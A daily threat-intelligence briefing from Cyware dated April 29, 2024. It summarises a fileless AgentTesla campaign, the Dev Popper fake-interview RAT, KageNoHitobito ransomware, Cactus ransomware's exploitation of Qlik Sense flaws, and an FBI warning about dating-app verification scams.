Cyware Daily Threat Intelligence
Daily Threat Briefing • April 29, 2024
Despite earlier warnings and disclosures, the Cactus ransomware group continues to exploit vulnerabilities in Qlik Sense, with thousands of servers still to be patched globally. Meet the new Dev Popper campaign that tricks developers with fake job interviews, leading to Python RAT infection. Likely of North Korean origin, it exploits trust in recruitment apps. Ransomware threats against Windows users have amplified with the discovery of KageNoHitobito, a new malicious strain masquerading as legitimate software or game cheats.
Finding love online has its perils. Fraudsters exploit online daters with fake verification apps, tricking them into divulging personal information for identity theft and financial scams, warned the FBI.
Top Malware Reported in the Last 24 Hours
Advanced fileless malware campaign detected
A sophisticated malware campaign was seen employing a VBA macro to download and execute a 64-bit Rust binary, facilitating fileless injection techniques. Leveraging CLR hosting, the malware loads a malicious AgentTesla payload into memory without writing files to disk. It patches APIs like “EtwEventWrite” and disables Event Tracing for Windows, followed by a shellcode download containing the payload. The shellcode dynamically resolves APIs, decrypts the payload, and executes it in memory.
Python RAT delivered via Fake job offers
A new cyber campaign dubbed "Dev Popper" tricks software developers with fake job interviews, leading them to download a Python RAT. Orchestrated by North Korean threat actors, the attack employs multi-stage social engineering tactics. Victims are instructed to run code from GitHub during the interview, unknowingly activating the RAT. Once installed, the trojan gathers system data and enables remote access.
New Windows ransomware menace
KageNoHitobito, a newly discovered ransomware, has surfaced to target Windows users worldwide. Believed to spread via file-sharing services, and wrapped as legitimate software or game cheats, it strategically avoids critical system files to ensure system functionality. Victims are directed to a TOR site for negotiation, utilizing the AbleOnion chat platform.
Top Vulnerabilities Reported in the Last 24 Hours
Cactus ransomware exploits Qlik Sense flaws
Months after Qlik disclosed security flaws, Cactus ransomware has been found abusing those to gain an initial foothold in target environments. The flaws, disclosed in August and September 2023, allow remote code execution. Despite prior warnings, thousands of Qlik Sense servers remain vulnerable, with over 3,000 exposed to Cactus group attacks. Fox-IT's scan revealed 122 likely compromised instances, emphasizing the urgency for remediation.
Top Scams Reported in the Last 24 Hours
Scammers exploit dating app users
The FBI warned of a new scam targeting online dating platform users. Fraudsters lure victims off dating platforms, offering a fake verification process to ensure safety. Victims unwittingly provide personal and financial details, eventually getting redirected to a paid dating site. Scammers profit from recurring fees and stolen information. This scheme mirrors pig butchering tactics, preying on trust. The FBI advises against moving conversations off reputable sites.